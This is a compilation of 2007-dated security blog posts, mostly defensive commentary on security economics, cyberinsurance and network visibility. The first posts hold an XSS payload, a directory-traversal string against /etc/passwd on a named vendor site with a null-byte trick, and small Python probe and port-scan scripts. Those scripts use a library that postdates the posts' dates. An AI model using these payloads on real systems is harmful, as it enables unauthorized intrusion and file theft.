Sunday, 30 September 2007

2 Factor Authentication Last Update

I think I am more or less done with my scope of work. There is simply no chance in hell that I can break that application. It's like no matter what I enter, I always get a "service not available" or "please try again later" message. I verified all the injection points and everything I could inject, and still nothing could be done. The application is so sensitive and secure that it validates all input characters and escapes all output characters. On top of that, every error message it outputs is a generic one with no further information. The last thing I am trying now is XSS on a 404 error page, to see how it reacts. Still, this is what I got:



And this is the generated source I got after the XSS attempt:

[404 Not Found
Not Found
The requested URL /x/--><script>alert("XSS")</script><!--&node=465600 was not found on this server.]
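
For reference, here is a minimal sketch of this kind of probe in Python (using the third-party requests library); the host is a placeholder and this is an illustration, not the exact test I ran:

import requests

PAYLOAD = '--><script>alert("XSS")</script><!--'

def probe_404_xss(base_url):
    # requests percent-encodes the unsafe characters in the URL, but the
    # web server typically decodes them before echoing the path into its
    # 404 page, which is where the reflection would show up.
    resp = requests.get(base_url + "/x/" + PAYLOAD)
    reflected = PAYLOAD in resp.text
    print(resp.status_code, "payload reflected unescaped:", reflected)
    return reflected

# probe_404_xss("http://target.example")  # placeholder host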

The Hacka Man

Have you downloaded your scancode?

I was reading Shreeraj's article on source code review, and it is a basic yet useful piece on the source code review process. In the article he walks the audience from dependency determination through to mitigation and countermeasures for a web application. On top of that, he includes a tool he coded himself called "scancode", which scans source code for potential XSS and SQL injection entry points. This is a must read for those who want to know more about the source code review process and methodology. Download scancode on page 3 of the article, right at the bottom.

http://www.oreillynet.com/pub/a/sysadmin/2006/11/02/webapp_security_scans.html
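
For flavour, this is roughly what a scanner like that does. Here is a minimal sketch in Python (my own illustration, not Shreeraj's code) that walks a source tree and flags common taint entry points and sinks:

import os, re, sys

# Heuristic patterns only; a real review still has to trace each hit.
PATTERNS = {
    "entry point (user input)": re.compile(r"Request\.(QueryString|Form)|\$_(GET|POST|REQUEST)"),
    "possible XSS sink": re.compile(r"Response\.Write|\becho\b|\bprint\b"),
    "possible SQLi sink": re.compile(r"(SELECT|INSERT|UPDATE|DELETE)\b.*[\"']\s*[+.]", re.IGNORECASE),
}

def scan(root):
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".asp", ".aspx", ".php", ".jsp")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="ignore") as f:
                for lineno, line in enumerate(f, 1):
                    for label, rx in PATTERNS.items():
                        if rx.search(line):
                            print("%s:%d: %s: %s" % (path, lineno, label, line.strip()))

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else ".")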

These days, I am so involved with application security that I have neglected the networking area. Well, I am trying to shift slowly away from the technical side of things and get more involved in business and development work. However, I will still keep myself abreast of the latest happenings in the security world.

The Hacka Man

Saturday, 29 September 2007

Adobe Directory Traversal???????

The other night Christ1an showed me a link on Adobe.com with a directory traversal. It is an old exploit, but it worked on Adobe, which shows that Adobe is not taking application security seriously. Well, I managed to see the entire /etc/passwd file and DAMN!! I did not take a screenshot of it. I was too careless and excited. The following day the issue was resolved, after reports had been made to Adobe. Check out the exploit that was used against Adobe:

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../../etc/passwd

Add a null byte character at the end of passwd. Please note that the exploit no longer works; however, this is the actual string I used a few nights ago.
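
If you want to test your own site for the same class of bug, here is a minimal sketch in Python (requests library; the URL and parameter are placeholders, and the Adobe one is fixed anyway):

import requests

def check_traversal(base_url, param):
    # Build the query string by hand so the literal %00 survives encoding;
    # the null byte historically truncated whatever extension the CGI
    # appended before opening the file.
    payload = "../" * 8 + "etc/passwd%00"
    resp = requests.get(base_url + "?" + param + "=" + payload)
    if "root:" in resp.text:
        print("Vulnerable: /etc/passwd contents returned")
    else:
        print("No passwd contents in response")

# check_traversal("http://www.example.com/download/download.cgi", "P1_Prod_Version")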

The Hacka Man

HashMaster v0.2

Damn, Rsnake just released a small yet useful program known as HashMaster. I was auditing a customer last weekend, and the hash was rather obfuscated and long. I am not sure if it was encryption or hashing, but I am going to try it against the customer this weekend. The program is very simple to use: just enter the cleartext password and the hash string into the form, and the program will work out the hashing algorithm used. This is rather useful, because once you know the hashing algorithm, you can use cracking software to recover the actual passwords. Well, good work Rsnake, you actually made my job easier!

http://ha.ckers.org/hashmaster
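
The idea behind it is simple enough to sketch yourself. A minimal Python illustration (my own, not Rsnake's code) that hashes the known cleartext with common algorithms until one matches the observed string:

import hashlib

def identify_hash(cleartext, observed):
    observed = observed.lower().strip()
    for algo in ("md5", "sha1", "sha224", "sha256", "sha384", "sha512"):
        if hashlib.new(algo, cleartext.encode()).hexdigest() == observed:
            return algo
    return None  # salted, iterated, or not a plain hash at all

print(identify_hash("password", "5f4dcc3b5aa765d61d8327deb882cf99"))  # -> md5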

The Hacka Man

Three Prereviews

I am fairly excited by several new books which arrived at my door last week. The first is Security Data Visualization by Greg Conti. I was pleased to see a book on visualization, and better yet, one printed in color! I expect to learn quite a bit from this book and hope to apply some of its lessons to my own work. The next book is End-to-End Network Security: Defense-in-Depth by Omar Santos. This book seems like a Cisco-centric approach to defending a network, but I decided to take a look when I noticed sections on forensics, visibility, and telemetry. The author includes several diagrams which show how to get information from a variety of devices in a manner similar to NSM. I hope to be able to operationalize this information as well. The last new book is LAN Switch Security: What Hackers Know About Your Switches by Eric Vyncke and Christopher Paggen. This book looks really interesting, and it is probably going to be my favorite of the three. I don't spend much time in my classes talking about layer 2 defenses, so it is good to see a modern book devoted to that topic. I believe most enterprises do little with layer 2 security, so perhaps this book can improve that situation.

Friday, 28 September 2007

Cyberinsurance in IT Security Management

One more thought before I retire this evening. I really enjoyed reading Cyberinsurance in IT Security Management by Walter S. Baer and Andrew Parkinson. Here are my favorite excerpts.

IT security has traditionally referred to technical protective measures such as firewalls, authentication systems, and antivirus software to counter such attacks, and mitigation measures such as backup hardware and software systems to reduce losses should a security breach occur. In a networked IT environment, however, the economic incentives to invest in protective security measures can be perverse. My investments in IT security might do me little good if other systems connected to me remain insecure because an adversary can use any unprotected system to launch an attack on others.

In economic terms, the private benefits of investment are less than the social benefits, making networked IT security a public good — and susceptible to the free-rider problem. As a consequence, private individuals and organizations won’t invest sufficiently in IT security to provide an optimal (or even adequate) level of societal protection.

In other areas, such as fire protection, insurance has helped align private incentives with the overall public good. A building owner must have fire insurance to obtain a mortgage or a commercial business license. Obtaining insurance requires that the building meet local fire codes and underwriting standards, which can involve visits from local government and insurance company inspectors. Insurance investigators also follow up on serious incidents and claims, both to learn what went wrong and to guard against possible insurance abuses such as arson or fraud. Insurance companies often sponsor research, offer training, and develop best-practice standards for fire prevention and mitigation.

Most important, insurers offer lower premiums to building owners who keep their facilities clean, install sprinklers, test their control systems regularly, and take other protective measures. Fire insurance markets thus involve not only underwriters, agents, and clients, but also code writers, inspectors, and vendors of products and services for fire prevention and protection. Although government remains involved, well-functioning markets for fire insurance keep the responsibility for and cost of preventive and protective measures largely within the private sector.


That is so compelling. Unfortunately, the cyberinsurance market is currently small:

[B]usinesses now generally buy stand-alone, specialized policies to cover cyberrisks. According to Betterley Risk Consultants surveys, the annual gross premium revenue for cyberinsurance policies has grown from less than US$100 million in 2002 to US$300 to 350 million by mid 2006. These estimates, which are based on confidential survey responses from companies offering cyberinsurance, are nearly an order of magnitude below earlier projections made by market researchers and industry groups such as the Insurance Information Institute.

But Betterley, like many other industry experts, believes that cyberinsurance will be one of the fastest growing segments of the property and casualty market over the next several years. With only 25 percent of respondents to the most recent Computer Security Institute/US Federal Bureau of Investigation Computer Crime and Security survey reporting that, “their organizations use external insurance to help manage cybersecurity risks,” the market has plenty of room for growth.


So what are the problems?

The reported 25 percent cyberinsurance adoption rate appears low to many observers, given well-publicized increases in IT security breaches and greater regulatory pressures to deal with them. Although we could partially attribute the slow uptake to how long it takes organizations to acknowledge new security risks and budget for them, several other factors seem to be of particular concern for cyberinsurance. They include problems of asymmetric information, interdependent and correlated risks, and inadequate reinsurance capacity...

Insurance companies feel the effect of asymmetric information both before and after a customer signs an insurance contract. They face the adverse selection problem—that is, a customer who has a higher risk of incurring a loss (through risky behaviors or other—perhaps innate—factors) will find insurance at a given premium more attractive than a lower-risk customer. If the insurer can’t differentiate between them—and offer differentiated premiums—it won’t be able to sustain a profitable business.

Of course, to some extent, insurance companies can differentiate between risk types; sophisticated models can predict risk for traditional property/casualty insurance, and health insurance providers try to identify risk factors through questionnaires and medical examinations. Insurers can also apply these mechanisms to cyberinsurance: they can undertake rigorous security assessments, examining in-depth IT deployment and security processes.

Although such methods can reduce the asymmetric information between insurer and policyholder, they can never completely eliminate it. Particularly in the information security field, because risk depends on many factors, including technical and human factors and their interaction, surveys can’t perfectly quantify risk, and premium differentiation will be imperfect.

The second impact of asymmetric information occurs after an insurance contract has been signed. Insured parties can take (hidden) actions that increase or decrease the risk of claiming (for example, in the case of car insurance, driving carelessly, not wearing a seatbelt, or failing to properly maintain the car), but the insurer can’t observe the insured’s actions perfectly. Under full insurance, an individual has little incentive to undertake precautionary measures because any loss is fully compensated—a problem economists term moral hazard.

Insurers may be able to mitigate certain actions through partial insurance (so making a claim carries a monetary or convenience cost) and clauses in the insurance contract—for example, policyholders must usually meet a set standard of care, and fraudulent or other criminal actions (such as arson) are prohibited. However, many actions remain unobservable, and it’s difficult to prove that a client didn’t meet a due standard of care.

Cyberinsurers could administer surveys at regular intervals and link coverage to a certain minimum standard of security. Although this might be feasible from a technical standpoint, human factors are often the weakest link in the chain and possibly unobservable, so the moral hazard problem might not be completely alleviated, implying that the purchase of cyberinsurance could in fact reduce efforts on information security. Nevertheless, purchasers also have incentives to increase effort—that is, to invest in security to obtain insurance or reduce premiums—that would outweigh moral hazard effects in a viable and well-functioning market.

The problem of asymmetric information is common to all insurance markets; however, most markets function adequately given the range of tactics used by insurance companies to overcome these information asymmetries. Many of these remedies have developed over time in response to experience and result in the well-functioning insurance markets we see today.


This gives me some hope. The article continues:

[G]overnment actions to spur development of the cyberinsurance market could include assigning liability for IT security breaches, mandating incident reporting, mandating cyberinsurance or financial responsibility, or facilitating reinsurance by indemnifying catastrophic losses. Clarifying liability law to assign liability “to the party that can do the best job of managing risk” would make good economic sense, but it seems a political nonstarter in the US—and the problem’s global nature would require a global response.

Similarly, government regulations that mandate reporting of cyberincidents (similar to that required for civil aviation incidents and contagious disease exposures) appear to have little political support. Probably more plausible in the short run would be contractual requirements that government contractors carry cyberliability insurance on projects highly dependent on IT security...

Jane Winn of the University of Washington School of Law has proposed a self-regulatory strategy, based on voluntary disclosures of compliance with security standards and enforcement through existing trade practices law, as a politically more viable alternative than new government regulation. Such a strategy would require increased public awareness of cybersecurity (with possible roles for government) as well as public demand that organizations disclose whether they comply with technical standards or industry best practices.

Disclosures would be monitored for compliance by their customers and competitors; and in the case of deceptive advertising, the US Federal Trade Commission could take enforcement action under existing regulation. This strategy could spur cyberinsurance adoption, which would indicate that the organization has passed a security audit or otherwise met underwriters’ security standards.

Perhaps the most important role for government would be to facilitate a full and deep cyberreinsurance market, as the UK and US have done for reinsurance of losses due to acts of terrorism.


What a great article. I recommend reading it.

Security Staff as Ultimate Insurance

I'm continuing to cite the Fifth Annual Global State of Information Security:

Speaking of striking back, the 2007 security survey shows a remarkable (some might say troubling) trend.

The IT department wants to control security again.

In the first year of collaboration on this survey, CIO, CSO and PWC noted that the more confident a company was in its security, the less likely that company's security group reported to IT. Those companies also spent more on security.

The reason CIO and CSO have always advocated for the separation of IT and security is the classic fox-in-the-henhouse problem. To wit, if the CIO controls both a major project dedicated to the innovative use of IT and the security of that project — which might slow down the project and add to its cost — he's got a serious conflict of interest. In the 2003 survey, one CISO said that conflict "is just too much to overcome. Having the CISO report to IT, it's a death blow."


Ouch. CIO continues:

What's going on here? Johnson has one theory: "Security seems to be following a trajectory similar to the quality movement 20 or 30 years ago, only with security it's happening much faster. During the quality movement, everyone created VPs of quality. They got CEO reporting status. But then in 10 years the position was gone or it was buried."

In the case of the quality movement, Johnson says, that may have been partly because quality became ingrained, a corporate value, and it didn't need a separate executive. But the evidence in the survey suggests that security is neither ingrained nor valued. It's not even clear companies know where to put security, which would explain the "gobs of dotted line" reporting structures.

That brings us to another theory: organizational politics. What if separating security from IT were creating checks on software development (not a bad thing, from a security standpoint)? What if all this security awareness the survey has indicated actually exposed the typical IT department's insecure practices?

One way for IT to respond would be to attempt to defang security. Keep its enemy close. Pull the function back to where it can be better controlled.


Interesting. The article finishes with these thoughts:

[M]aybe security was never as separate as it seemed. Companies created CISO-type positions but never gave them authority. "I continually see security people put in the position of fall guy," says Woerner of TD Ameritrade. "Maybe some of that separation was, subconsciously, creating a group to take the hit."

This leads me to the title of my post. What if security staff is the ultimate insurance -- for the CIO? In other words, what if the CIO performs "security theater," creating a CISO position and staff, but doesn't give the CISO the authority or resources to properly defend the enterprise? If no breaches seem to occur, the CIO looks like a hero for keeping security spending low. If a breach does occur (and is discovered), the CIO blames the CISO. The CISO is fired and the CIO keeps his/her job -- at least for now. I don't see a CIO executing this strategy more than once successfully.

What do you think?

Visibility, Visibility, Visibility

CIO Magazine's Fifth Annual Global State of Information Security features an image of a happy, tie-wearing corporate security person laying bricks to make a wall, while a dark-clad intruder with a crow bar violates the laws of physics by lifting up another section of the wall like it was made of fabric. That's a very apt reference to Soccer Goal Security, and I plan to discuss security physics in a future post. Right now I'd like to feature a few choice excerpts from the story:

Awareness of the problematic nature of information security is approaching an all-time high. Out of every IT dollar spent, 15 cents goes to security. Security staff is being hired at an increasing rate. Surprisingly, however, enterprise security isn't improving...

Are you feeling the disquiet that comes from knowing there's no reason why your company can't be the next TJX? The angst of knowing that these modern plagues — these spam e-mails, these bots, these rootkits — will keep coming at you no matter how much time and money you spend trying to stop them? The chill that comes from knowing how much you don't know...

You're undergoing a shift from a somewhat blissful ignorance of the serious flaws in computer security to a largely depressing knowledge of them...

"That next level of maturity has not been reached," says Mark Lobel, a principal with PWC's advisory services. "We have the technology but still don't have our hands around what's important and what we should be monitoring and protecting.


Not everyone has shifted from "somewhat blissful ignorance" to "largely depressing knowledge" yet, but they'll get there eventually.

Five years ago, 36 percent of respondents to the "Global State of Information Security" survey reported that they had suffered zero security incidents. This year, that number was down to 22 percent.

Does this mean there are more incidents? We don't think so. We believe it simply means that more companies are aware of the incidents that they've always suffered but into which, until recently, they had no visibility. Those once inexplicable network outages are now known to be security incidents. Perhaps a spam outbreak wasn't considered a security incident before, but now that it can deliver malware, it is. Awareness is higher, and that's because companies have spent the past five years building an infrastructure that creates visibility into their security posture.


That's right -- visibility. I love it.

This year marks the first time "employees" beat out "hackers" as the most likely source of a security incident. Executives in the security field, with the most visibility into incidents, were even more likely to name employees as the source.

Have employees suddenly turned more malicious? Are inside jobs suddenly more fashionable and productive than they used to be? Probably not. Most security experts will tell you that the insider threat is relatively constant and is usually bigger than its victims suspect. None of us wants to think we've hired an untrustworthy person.

This spike in assigning the blame for breaches and attacks to employees is probably more like the dip in companies that report zero incidents — a reflection of awareness, of managers' ability to recognize what was always there but what they couldn't previously determine.


I'd agree with that. I would also blame misreporting surfing pr0n sites and the like as "security incidents." CIO continues:

But here's an odd paradox: Despite the massive buildup of people, process and technology during the past five years, and fewer people reporting zero incidents, 40 percent of respondents didn't know how many incidents they've suffered, up from 29 percent last year.

The rate of "Don't know" for the type of incident and the primary method used to attack also spiked.

It doesn't bode well that after years of buying and installing systems and processes to improve security, close to half of the respondents didn't have a clue as to what was going on in their own enterprises. But when close to a third of CSOs and CISOs, who presumably should have the most insight into security incidents, said they don't know how many incidents they've suffered or how these incidents occurred, that's even worse...

The truth is, systems, processes, tools, hardware and software, and even knowledge and understanding only get you so far. As [Ron] Woerner puts it, "When you gain visibility, you see that you can't see all the potential problems. You see that maybe you were spending money securing the wrong things. You see that a good employee with good intentions who wants to take work home can become a security incident when he loses his laptop or puts data on his home computer. There's so much out there, it's overwhelming."

Woerner and others believe that the security discipline has so far been skewed toward technology—firewalls, ID management, intrusion detection—instead of risk analysis and proactive intelligence gathering.


Check this out, too. Someone recognizes the nature of Attacker 3.0:

Furthermore, even a cursory look at security trends demonstrates that adversaries, be they disgruntled employees or hackers, have far more sophisticated tools than the ones that have been put in place to stop them. Antiforensics. Mass distribution of malware through compromised websites. Botnets. Keyloggers. Companies may have spent the past five years building up their security infrastructure, but so have the bad guys. Awareness includes a new level of understanding of how little you know about how the bad guys operate. As arms races go, the bad guys are way ahead.

So what can we do about this? Say it isn't so:

What can be done about all this? Be strategic. Security investment must shift from the technology-heavy, tactical operation it has been to date to an intelligence-centric, risk analysis and mitigation philosophy.

Information and security executives should, for example, be putting their dollars into industry information sharing. "Collaboration is key," says Woerner. They should invest in security research and technical staff that can capture and dissect malware, and they should troll the Internet underground for the latest trends and leads.
(emphasis added)

I would add that it's only appropriate to turn to advanced sources when you have the security basics in place. It's no use trying to learn how to defend against attacker 2.0 or 3.0 if you can't handle 1.0.

There's more to say about this survey, but I'll save the rest for a second post because the nature of it is so different from this one.

Excerpts from Ross Anderson / Tyler Moore Paper

I got a chance to read a new paper by one of my three wise men (Ross Anderson) and his colleague (Tyler Moore): Information Security Economics - and Beyond. The following are my favorite sections.

Over the last few years, people have realised that security failure is caused by bad incentives at least as often as by bad design. Systems are particularly prone to failure when the person guarding them does not suffer the full cost of failure...

[R]isks cannot be managed better until they can be measured better. Most users cannot tell good security from bad, so developers are not compensated for efforts to strengthen their code. Some evaluation schemes are so badly managed that ‘approved’ products are less secure than random ones. Insurance is also problematic; the local and global correlations exhibited by different attack types largely determine what sort of insurance markets are feasible. Cyber-risk markets are thus generally uncompetitive, underdeveloped or specialised...

One of the observations that sparked interest in information security economics came from banking. In the USA, banks are generally liable for the costs of card fraud; when a customer disputes a transaction, the bank must either show she is trying to cheat it, or refund her money. In the UK, the banks had a much easier ride: they generally got away with claiming that their systems were ‘secure’, and telling customers who complained that they must be mistaken or lying. “Lucky bankers,” one might think; yet UK banks spent more on security and suffered more fraud. This may have been what economists call a moral-hazard effect: UK bank staff knew that customer complaints would not be taken seriously, so they became lazy and careless, leading to an epidemic of fraud.

In 1997, Ayres and Levitt analysed the Lojack car-theft prevention system and found that once a threshold of car owners in a city had installed it, auto theft plummeted, as the stolen car trade became too hazardous. This is a classic example of an externality, a side-effect of an economic transaction that may have positive or negative effects on third parties. Camp and Wolfram built on this in 2000 to analyze information security vulnerabilities as negative externalities, like air pollution: someone who connects an insecure PC to the Internet does not face the full economic costs of that, any more than someone burning a coal fire. They proposed trading vulnerability credits in the same way as carbon credits...

Asymmetric information plays a large role in information security. Moore showed that we can classify many problems as hidden-information or hidden-action problems. The classic case of hidden information is the ‘market for lemons'. Akerlof won a Nobel prize for the following simple yet profound insight: suppose that there are 100 used cars for sale in a town: 50 well-maintained cars worth $2000 each, and 50 ‘lemons’ worth $1000. The sellers know which is which, but the buyers don’t. What is the market price of a used car? You might think $1500; but at that price no good cars will be offered for sale. So the market price will be close to $1000.

Hidden information, about product quality, is one reason poor security products predominate. When users can’t tell good from bad, they might as well buy a cheap antivirus product for $10 as a better one for $20, and we may expect a race to the bottom on price.

Hidden-action problems arise when two parties wish to transact, but one party’s unobservable actions can impact the outcome. The classic example is insurance, where a policyholder may behave recklessly without the insurance company observing this...

[W]hy do so many vulnerabilities exist in the first place? A useful analogy might come from considering large software project failures: it has been known for years that perhaps 30% of large development projects fail, and this figure does not seem to change despite improvements in tools and training: people just build much bigger disasters nowadays than they did in the 1970s. This suggests that project failure is not fundamentally about technical risk but about the surrounding socio-economic factors (a point to which we will return later).

Similarly, when considering security, software writers have better tools and training than ten years ago, and are capable of creating more secure software, yet the economics of the software industry provide them with little incentive to do so.

In many markets, the attitude of ‘ship it Tuesday and get it right by version 3’ is perfectly rational behaviour. Many software markets have dominant firms thanks to the combination of high fixed and low marginal costs, network externalities and client lock-in noted above, so winning market races is all-important. In such races, competitors must appeal to complementers, such as application developers, for whom security gets in the way; and security tends to be a lemons market anyway. So platform vendors start off with too little security, and such as they provide tends to be designed so that the compliance costs are dumped on the end users. Once a dominant position has been established, the vendor may add more security than is needed, but engineered in such a way as to maximise customer lock-in.

In some cases, security is even worse than a lemons market: even the vendor does not know how secure its software is. So buyers have no reason to pay more for protection, and vendors are disinclined to invest in it.

How can this be tackled? Economics has suggested two novel approaches to software security metrics: vulnerability markets and insurance...

Several variations on vulnerability markets have been proposed. Bohme has argued that software derivatives might be better. Contracts for software would be issued in pairs: the first pays a fixed value if no vulnerability is found in a program by a specific date, and the second pays another value if one is found. If these contracts can be traded, then their price should reflect the consensus on software quality. Software vendors, software company investors, and insurance companies could use such derivatives to hedge risks. A third possibility, due to Ozment, is to design a vulnerability market as an auction...

An alternative approach is insurance. Underwriters often use expert assessors to look at a client firm’s IT infrastructure and management; this provides data to both the insured and the insurer. Over the long run, insurers learn to value risks more accurately. Right now, however, the cyber-insurance market is both underdeveloped and underutilised. One reason, according to Bohme and Kataria, is the interdependence of risk, which takes both local and global forms. Firms’ IT infrastructure is connected to other entities – so their efforts may be undermined by failures elsewhere.

Cyber-attacks often exploit a vulnerability in a program used by many firms. Interdependence can make some cyber-risks unattractive to insurers – particularly those risks that are globally rather than locally correlated, such as worm and virus attacks, and systemic risks such as Y2K.

Many writers have called for software risks to be transferred to the vendors; but if this were the law, it is unlikely that Microsoft would be able to buy insurance. So far, vendors have succeeded in dumping most software risks; but this outcome is also far from being socially optimal. Even at the level of customer firms, correlated risk makes firms under-invest in both security technology and cyber-insurance. Cyber-insurance markets may in any case lack the volume and liquidity to become efficient.
(emphasis added)

If you made it this far, here's my small contribution to this paper: what about breach derivatives? To paraphrase the paper, contracts for companies would be issued in pairs: the first pays a fixed value if no breach is reported by a company by a specific date, and the second pays another value if one is reported. If these contracts can be traded, then their price should reflect the consensus on company security.
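
To make the pricing intuition concrete, here is a small worked example with made-up numbers; under risk-neutral pricing, the contract price divided by the payout is the market's consensus probability:

payout = 100.0          # each contract pays 100 if its event occurs
price_no_breach = 70.0  # hypothetical market price of the "no breach reported by date D" contract

implied_p_no_breach = price_no_breach / payout   # price = payout * P(event)
implied_p_breach = 1 - implied_p_no_breach
print("Market-implied breach probability: %.0f%%" % (implied_p_breach * 100))  # 30%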

I understand the incentives for companies to stay quiet about breaches, but this market could encourage people to report. I imagine it could also encourage intruders to compromise a company intentionally, as the authors mention:

One criticism of all market-based approaches is that they might increase the number of identified vulnerabilities by motivating more people to search for flaws.

What do you think?

Microsoft's Anemone Project

While flying to Los Angeles this week I read a great paper by Microsoft and Michigan researchers: Reclaiming Network-wide Visibility Using Ubiquitous Endsystem Monitors. From the Abstract:

Network-centric tools like NetFlow and security systems like IDSes provide essential data about the availability, reliability, and security of network devices and applications. However, the increased use of encryption and tunnelling has reduced the visibility of monitoring applications into packet headers and payloads (e.g. 93% of traffic on our enterprise network is IPSec encapsulated). The result is the inability to collect the required information using network-only measurements.

To regain the lost visibility we propose that measurement systems must themselves apply the end-to-end principle: only endsystems can correctly attach semantics to traffic they send and receive. We present such an end-to-end monitoring platform that ubiquitously records per-flow data and then we show that this approach is feasible and practical using data from our enterprise network.


This is cool. How does it work?

Each endsystem in a network runs a small daemon that uses spare disk capacity to log network activity. Each desktop, laptop and server stores summaries of all network traffic it sends or receives. A network operator or management application can query some or all endsystems, asking questions about the availability, reachability, and performance of network resources and servers throughout the organization...

Ubiquitous network monitoring using endsystems is fundamentally different from other edge-based monitoring: the goal is to passively record summaries of every flow on the network rather than to collect availability and performance statistics or actively probe the network...

It also provides a far more detailed view of traffic because endsystems can associate network activity with host context such as the application and user that sent a packet. This approach restores much of the lost visibility and enables new applications such as network auditing, better data centre management, capacity planning, network forensics, and anomaly detection.

Using real data from an enterprise network we present preliminary results showing that instrumenting, collecting, and querying data from endsystems in a large network is both feasible and practical.
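
The paper does not publish code or a schema, but as a sketch of the data model, with field names that are my own assumptions, each endsystem would log something like this and answer operator queries over it:

from collections import namedtuple
from datetime import datetime

# Hypothetical per-flow summary; note the host context (app, user) that
# network-only monitoring cannot see.
Flow = namedtuple("Flow", "start end proto src_ip src_port dst_ip dst_port "
                          "bytes_sent bytes_recv app user")

def flows_to_host(records, dst_ip):
    # Operator query: which users and applications talked to a given server?
    for r in records:
        if r.dst_ip == dst_ip:
            yield (r.user, r.app, r.bytes_sent + r.bytes_recv)

records = [
    Flow(datetime(2007, 9, 27, 9, 0), datetime(2007, 9, 27, 9, 1), "tcp",
         "10.1.1.5", 4321, "10.2.2.10", 443, 8000, 120000, "outlook.exe", "alice"),
]
for user, app, total in flows_to_host(records, "10.2.2.10"):
    print(user, app, total)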


How practical?

For example, our own enterprise network contains approximately 300,000 endsystems and 2,500 routers. While it is possible to construct an endsystem monitor in an academic or ISP network, there are significant additional deployment challenges that must be addressed. Thus, we focus on deployment in enterprise and government networks that have control over software and a critical need for better network visibility...

Even under ideal circumstances there will inevitably be endsystems that simply cannot easily be instrumented, such as printers and other hardware running embedded software. Thus, a key factor in the success of this approach is obtaining good visibility without requiring instrumentation of all endsystems in a network. Even if complete instrumentation were possible, deployment becomes significantly more likely where incremental benefit can be observed...

[I]nstrumenting just 1% of endsystems was enough to monitor 99.999% of bytes on the network. This 1% is dominated by servers of various types (e.g. backup, file, email, proxies), common in such networks.


Wow -- in other words, just pick the right systems to instrument and you end up capturing a LOT of traffic.

How heavy is the load?

To evaluate the per-endsystem CPU overhead we constructed a prototype flow capture system using the ETW event system [Event Tracing for Windows]. ETW is a low overhead event posting infrastructure built into the Windows OS, and so a straightforward usage where an event is posted per-packet introduces overhead proportional to the number of packets per second processed by an endsystem.

We computed observed packets per second over all hosts, and the peak was approximately 18,000 packets per second and the mean just 35 packets per second. At this rate of events, published figures for ETW [Magpie] suggest an overhead of no more than a few percent on a reasonably provisioned server...

[F]or a 1 second export period there are periods of high traffic volume requiring a large number of records be written out. However, if the export timer is set at 300 seconds, the worst case disk bandwidth required is ≃4.5 MB in 300 seconds, an average rate of 12 kBps.

The maximum storage required by a single machine for an entire week of records is ≃1.5 GB, and the average storage just ≃64 kB. Given the capacity and cost of modern hard disks, these results indicate very low resource overhead.


This is great. I emailed the authors to see if they have an implementation I could test. The home for this work appears to be the Microsoft Anemone Project.

Be the Caveman

I just read a great story by InformationWeek's Sharon Gaudin titled Interview With A Convicted Hacker: Robert Moore Tells How He Broke Into Routers And Stole VoIP Services:

Convicted hacker Robert Moore, who is set to go to federal prison this week, says breaking into 15 telecommunications companies and hundreds of businesses worldwide was incredibly easy because simple IT mistakes left gaping technical holes.

Moore, 23, of Spokane, Wash., pleaded guilty to conspiracy to commit computer fraud and is slated to begin his two-year sentence on Thursday for his part in a scheme to steal voice over IP services and sell them through a separate company. While prosecutors call co-conspirator Edwin Pena the mastermind of the operation, Moore acted as the hacker, admittedly scanning and breaking into telecom companies and other corporations around the world.

"It's so easy. It's so easy a caveman can do it," Moore told InformationWeek, laughing. "When you've got that many computers at your fingertips, you'd be surprised how many are insecure."
(emphasis added)

So easy a caveman can do it? Just what happened here?

The government identified more than 15 VoIP service providers that were hacked into, adding that Moore scanned more than 6 million computers just between June and October of 2005. AT&T reported to the court that Moore ran 6 million scans on its network alone...

Moore said what made the hacking job so easy was that 70% of all the companies he scanned were insecure, and 45% to 50% of VoIP providers were insecure. The biggest insecurity? Default passwords.

"I'd say 85% of them were misconfigured routers. They had the default passwords on them," said Moore. "You would not believe the number of routers that had 'admin' or 'Cisco0' as passwords on them. We could get full access to a Cisco box with enabled access so you can do whatever you want to the box...

He explained that he would first scan the network looking mainly for the Cisco and Quintum boxes. If he found them, he would then scan to see what models they were and then he would scan again, this time for vulnerabilities, like default passwords or unpatched bugs in old Cisco IOS boxes. If he didn't find default passwords or easily exploitable bugs, he'd run brute-force or dictionary attacks to try to break the passwords.


So, we have massively widespread scanning, discovery of routers, and attempted logins. No kidding this is caveman-fu.

And Moore didn't just focus on telecoms. He said he scanned "anybody" -- businesses, agencies and individual users. "I know I scanned a lot of people," he said. "Schools. People. Companies. Anybody. I probably hit millions of normal [users], too."

Moore said it would have been easy for IT and security managers to detect him in their companies' systems ... if they'd been looking. The problem was that, generally, no one was paying attention.

"If they were just monitoring their boxes and keeping logs, they could easily have seen us logged in there," he said, adding that IT could have run its own scans, checking to see logged-in users. "If they had an intrusion detection system set up, they could have easily seen that these weren't their calls."
(emphasis added)

Didn't someone tell Robert Moore that "IDS is dead?" Apparently all of these victim companies heard it, and turned off their visibility mechanisms.

My advice? Be the caveman. Perform adversary simulation. This is the simplest possible way to pretend you are a bad guy and get realistic, actionable results (a minimal sketch follows the list below).

  1. Identify all of your external IP addresses.

  2. Scan them.

  3. Try to log into remote administration services you find in Step 2.

  4. Report your findings to device owners when you gain access.
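
Here is that minimal sketch in Python, covering steps 1 and 2 and pointing at 3 and 4; the addresses are placeholders, and you should only scan hosts you are authorized to test:

import socket

ADMIN_PORTS = {22: "ssh", 23: "telnet", 80: "http", 443: "https", 3389: "rdp"}

def scan_host(ip, timeout=1.0):
    open_ports = []
    for port, svc in ADMIN_PORTS.items():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            if s.connect_ex((ip, port)) == 0:   # 0 means the TCP connect succeeded
                open_ports.append((port, svc))
        finally:
            s.close()
    return open_ports

for ip in ["192.0.2.10", "192.0.2.11"]:   # step 1: your external IPs (placeholders)
    for port, svc in scan_host(ip):       # step 2: scan them
        # steps 3 and 4: try default credentials by hand, then report to the owner
        print("%s:%d (%s) open" % (ip, port, svc))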


How difficult is that? This methodology is nowhere near effective against targeted threats that want to compromise you specifically, but it would work against this sort of opportunistic threat.

PS: If I hear one more time that "scanning is too dangerous for our network" I will officially Lose It. Scanning of external systems happens 24x7. If you really don't want an authorized party to scan your external network, try setting up a passive detection system like PADS and wait for a bad guy to ignore the fragility of your systems and scan them for you. Gather his results passively and then act on them.

Snort Report 9 Posted

